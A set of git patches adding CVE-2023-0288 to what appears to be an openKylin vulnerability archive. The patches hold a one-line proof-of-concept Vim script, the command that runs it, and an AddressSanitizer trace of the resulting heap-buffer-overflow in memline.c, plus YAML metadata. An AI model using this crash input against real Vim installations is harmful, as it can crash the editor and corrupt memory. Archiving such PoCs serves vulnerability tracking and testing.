From 845c38add6a4c9f8d553ef785c6073c732f83513 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E9=83=81=E5=90=AB?= Date: Wed, 22 Mar 2023 13:14:15 +0000 Subject: [PATCH 1/6] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2023-0288?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/vim/2023/CVE-2023-0288/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/vim/2023/CVE-2023-0288/.keep diff --git a/cve/vim/2023/CVE-2023-0288/.keep b/cve/vim/2023/CVE-2023-0288/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 9a327a8bafba39f18f0d61f64760d5fa22d913a4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E9=83=81=E5=90=AB?= Date: Wed, 22 Mar 2023 13:14:53 +0000 Subject: [PATCH 2/6] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE=5F2023=5F0288?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E4=BF=A1=E6=81=AF?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王郁含 --- cve/vim/2023/CVE-2023-0288/poc_hbo02_s.dat | 1 + cve/vim/2023/CVE-2023-0288/readme.md | 101 +++++++++++++++++++++ 2 files changed, 102 insertions(+) create mode 100644 cve/vim/2023/CVE-2023-0288/poc_hbo02_s.dat create mode 100644 cve/vim/2023/CVE-2023-0288/readme.md diff --git a/cve/vim/2023/CVE-2023-0288/poc_hbo02_s.dat b/cve/vim/2023/CVE-2023-0288/poc_hbo02_s.dat new file mode 100644 index 00000000..78779922 --- /dev/null +++ b/cve/vim/2023/CVE-2023-0288/poc_hbo02_s.dat @@ -0,0 +1 @@ +sil0norm8R V{zf8=Lu \ No newline at end of file diff --git a/cve/vim/2023/CVE-2023-0288/readme.md b/cve/vim/2023/CVE-2023-0288/readme.md new file mode 100644 index 00000000..5ad3db9d --- /dev/null +++ b/cve/vim/2023/CVE-2023-0288/readme.md @@ -0,0 +1,101 @@ +#### 描述 + +memline.c:2951处函数ml_append_int中基于堆的缓冲区溢出 + +#### 影响版本 + +``` +git log +commit 043d7b2c84cda275354aa023b5769660ea70a168 (HEAD -> master, tag: v9.0.1182, origin/master, origin/HEAD) +``` + +#### Proof of Concept + +``` +./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_hbo02_s.dat -c :qa! +================================================================= +==11458==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000009d00 at pc 0x00000049950f bp 0x7ffcbaff3ef0 sp 0x7ffcbaff36b8 +READ of size 2147479553 at 0x621000009d00 thread T0 + #0 0x49950e in __asan_memmove (/home/fuzz/vim/src/vim+0x49950e) + #1 0xabc5d7 in ml_append_int /home/fuzz/vim/src/memline.c:2951:6 + #2 0xa9b51f in ml_flush_line /home/fuzz/vim/src/memline.c:4109:9 + #3 0xab24bc in ml_append_flush /home/fuzz/vim/src/memline.c:3370:2 + #4 0xab2342 in ml_append_flags /home/fuzz/vim/src/memline.c:3415:12 + #5 0x117b44a in u_undoredo /home/fuzz/vim/src/undo.c:2821:7 + #6 0x117535b in u_doit /home/fuzz/vim/src/undo.c:2273:6 + #7 0x1174c1a in u_undo /home/fuzz/vim/src/undo.c:2214:5 + #8 0xbaad92 in nv_kundo /home/fuzz/vim/src/normal.c:4737:2 + #9 0xba3d19 in nv_undo /home/fuzz/vim/src/normal.c:4719:2 + #10 0xb6448b in normal_cmd /home/fuzz/vim/src/normal.c:939:5 + #11 0x83ea0e in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887:6 + #12 0x83e238 in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850:5 + #13 0x83dde9 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768:6 + #14 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2 + #15 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17 + #16 0xea1d75 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1672:5 + #17 0xe9e7d6 in do_source /home/fuzz/vim/src/scriptfile.c:1818:12 + #18 0xe9e10c in cmd_source /home/fuzz/vim/src/scriptfile.c:1163:14 + #19 0xe9d7ee in ex_source /home/fuzz/vim/src/scriptfile.c:1189:2 + #20 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2 + #21 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17 + #22 0x7f7831 in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587:12 + #23 0x14c4e12 in exe_commands /home/fuzz/vim/src/main.c:3146:2 + #24 0x14c0fae in vim_main2 /home/fuzz/vim/src/main.c:782:2 + #25 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12 + #26 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 + #27 0x41eaad in _start (/home/fuzz/vim/src/vim+0x41eaad) + +0x621000009d00 is located 0 bytes to the right of 4096-byte region [0x621000008d00,0x621000009d00) +allocated by thread T0 here: + #0 0x499d0d in malloc (/home/fuzz/vim/src/vim+0x499d0d) + #1 0x4cb3ea in lalloc /home/fuzz/vim/src/alloc.c:246:11 + #2 0x4cb2ca in alloc /home/fuzz/vim/src/alloc.c:151:12 + #3 0x14ce9f5 in mf_alloc_bhdr /home/fuzz/vim/src/memfile.c:884:21 + #4 0x14cd807 in mf_new /home/fuzz/vim/src/memfile.c:375:26 + #5 0xa98308 in ml_new_data /home/fuzz/vim/src/memline.c:4138:15 + #6 0xa96ca7 in ml_open /home/fuzz/vim/src/memline.c:391:15 + #7 0x503cd6 in open_buffer /home/fuzz/vim/src/buffer.c:192:9 + #8 0x14c265c in create_windows /home/fuzz/vim/src/main.c:2915:9 + #9 0x14c092d in vim_main2 /home/fuzz/vim/src/main.c:713:5 + #10 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12 + #11 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 + +SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/fuzz/vim/src/vim+0x49950e) in __asan_memmove +Shadow bytes around the buggy address: + 0x0c427fff9350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fff9360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fff9370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fff9380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fff9390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c427fff93a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff93c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff93e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff93f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb + Shadow gap: cc +==11458==ABORTING +``` + +#### 影响 + +这个漏洞能够使软件崩溃,修改内存,并可能造成远程执行。 \ No newline at end of file -- Gitee From 3704e82c1e3930494e86ca7e8d292ea3c5c14655 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E9=83=81=E5=90=AB?= Date: Wed, 22 Mar 2023 13:21:53 +0000 Subject: [PATCH 3/6] add cve/vim/2023/yaml/CVE-2023-0288. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王郁含 --- cve/vim/2023/yaml/CVE-2023-0288 | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cve/vim/2023/yaml/CVE-2023-0288 diff --git a/cve/vim/2023/yaml/CVE-2023-0288 b/cve/vim/2023/yaml/CVE-2023-0288 new file mode 100644 index 00000000..08329eac --- /dev/null +++ b/cve/vim/2023/yaml/CVE-2023-0288 @@ -0,0 +1,19 @@ +id: CVE-2023-0288 +source: https://huntr.dev/bounties/550a0852-9be0-4abe-906c-f803b34e41d3/ +info: + name: Vim是一款基于UNIX平台的编辑器。 + severity: high + description: | + GitHub存储库vim/vim在9.0.1182版本存在堆buffer溢出漏洞。 + scope-of-influence: + vim < 9.0.1182 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-0288 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2023-0288 + cwe-id: CWE-122 + cnvd-id: None + kve-id: None + tags: cve2023, 堆buffer溢出漏洞 \ No newline at end of file -- Gitee From e99846f21ee92c69366e8947f0c0c75f08b3b6f7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E9=83=81=E5=90=AB?= Date: Wed, 22 Mar 2023 13:23:33 +0000 Subject: [PATCH 4/6] update openkylin_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王郁含 --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index e5495c40..53dee267 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -107,6 +107,7 @@ cve: - CVE-2023-0049 - CVE-2023-0051 - CVE-2023-0054 + - CVE-2023-0288 - CVE-2023-0512 - CVE-2023-1127 openssl: -- Gitee From c1bc124c70701c0f9def5f1c2b13167b8969f068 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E9=83=81=E5=90=AB?= Date: Fri, 24 Mar 2023 02:53:50 +0000 Subject: [PATCH 5/6] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?vim/2023/CVE-2023-0288/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/vim/2023/CVE-2023-0288/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/vim/2023/CVE-2023-0288/.keep diff --git a/cve/vim/2023/CVE-2023-0288/.keep b/cve/vim/2023/CVE-2023-0288/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 76b9e476ceacd1ca52feba9efa013b641a478074 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E9=83=81=E5=90=AB?= Date: Fri, 24 Mar 2023 02:54:07 +0000 Subject: [PATCH 6/6] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/vim/2023/?= =?UTF-8?q?yaml/CVE-2023-0288=20=E4=B8=BA=20cve/vim/2023/yaml/CVE-2023-028?= =?UTF-8?q?8.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/vim/2023/yaml/{CVE-2023-0288 => CVE-2023-0288.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/vim/2023/yaml/{CVE-2023-0288 => CVE-2023-0288.yaml} (100%) diff --git a/cve/vim/2023/yaml/CVE-2023-0288 b/cve/vim/2023/yaml/CVE-2023-0288.yaml similarity index 100% rename from cve/vim/2023/yaml/CVE-2023-0288 rename to cve/vim/2023/yaml/CVE-2023-0288.yaml -- Gitee